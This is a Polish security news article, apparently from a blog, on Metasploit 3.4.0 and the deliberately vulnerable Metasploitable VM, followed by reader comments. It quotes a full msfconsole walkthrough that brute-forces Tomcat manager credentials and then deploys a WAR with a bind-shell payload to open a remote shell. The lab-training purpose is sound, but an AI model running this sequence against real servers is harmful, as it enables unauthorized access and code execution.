12:41
20/5/2010

Wraz z nową wersją Metasploita 3.4.0 w sieci udostępniono dedykowaną mu maszynę wirtualną — Metasploitable — od góry do dołu załadowaną podatnym na atak oprogramowaniem. Dzięki niej, można do woli i bez obaw testować zaimplementowane w Metasploitcie ataki i exploity.

Jeśli nie czujecie się mocni z metasploita, polecamy zacząć lekturę tego artykułu od 7 godzinnego szkolenia z technik penetracji sieci przy pomocy tego narzędzia.

 

Metasploit 3.4.0

Od ostatniego wydania (3.3) pojawiło się 100 nowych exploitów i załatano 200 błedów. Teraz meterpreter może od razu zrzucać screenshoty (niepotrzebna migracja) oraz swobodnie przeskakiwać pomiędzy procesami 32- i 64-bitowymi na zaatakowanej maszynie.

Ulepszona komenda “getsystem”, korzysta z kilku technik do zdobycia praw administratora, jedną z nich jest opisywana przez nas 17 dziura w Windowsach znaleziona przez Tavisa Ormandego. Metasplolit w wersji 3.4.0 dorobił się także wsparcia dla ataków bruteforce na protokoły sieciowe (m.in SSH, Telnet, MySQL, Postgres, SMB, DB2).

Metasploit Express

Warto również wspomnieć, że pojawiła się płatna wersja o nazwie Metasplit Express, która dzięki interfejsowi graficznemu, automatyzacji ataków, obszernym logom i modułowi do generowania raportów oraz wsparciu technicznemu zdecydowanie ułatwia pracę pentestera i może być cieplej przyjęta w niektórych środowiskach ;)

Metasploit Express

Metasploitable

Metasploitable to z kolei obraz VMWare 6.5, bazujący na Ubuntu 8.04. Z podatnych na atak paczek zainstalowano m.in. tomcat 5.5, distcc, tikiwiki, twiki, i mysql. Metasploitable jest analogią do niedawno opublikowanej przez Google dziurawej webaplikacji.

Z ciekawych ataków, które można przeprowadzić na metasploitable dzięki metasploitowi, autor oprogramowania przytacza:
msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit
...
[+] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'both' with password:'admin'

Jak widać, znaleźliśmy login i hasło do serwera. Spróbujmy teraz wykorzystać kolejny exploit i uzyskać shella.

msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux X86"
[*] Uploading 1612 bytes as HJpy1H.war ...
[*] Executing /HJpy1H/EpKaNLsCQUUjo.jsp...
[*] Undeploying HJpy1H ...
[*] Sending stage (36 bytes) to metasploitable
[*] Command shell session 1 opened (10.0.0.11:39497 -> 10.0.0.33:4444) at 2010-05-19 11:53:12 -0500

…i mamy shella!

Pobierz nowego Metasploita:
Pobierz Metasploitable
Pobierz VMWare Playera

Przeczytaj także:


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

5 komentarzy

Dodaj komentarz
  1. Metasploit++
    Kawał dobrej roboty i duży krok do przodu w rozwoju framework`u :D

  2. Jak na razie okazuje się, że przejęcie MSF przez komercyjność wyszło im na dobre. Szybciej, lepiej, więcej. Zobaczymy jak długo. Trzymam kciuki.

  3. Wersja “express” ma niebywale interesujące “terms and conditions” ;) Trochę za dużo wejść i wyjść na i z komputera jak na mój gust… po zaakceptowaniu takich warunków można się pochorować od przeciągów ;D.

  4. pobralem back trac4 na pendrajwa i jak mam go teraz zainstalowac zeby uzywac?

  5. hardko11 – Jak to jak używać ?
    Zgodnie z przeznaczeniem i nie łamiąc prawa :) !

    A skoro umiesz pobrac plik i umiesz pisać na klawikordzie spojrz na odpowiednie tutki, tudzież pogadaj z wujkiem w goglach :)

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: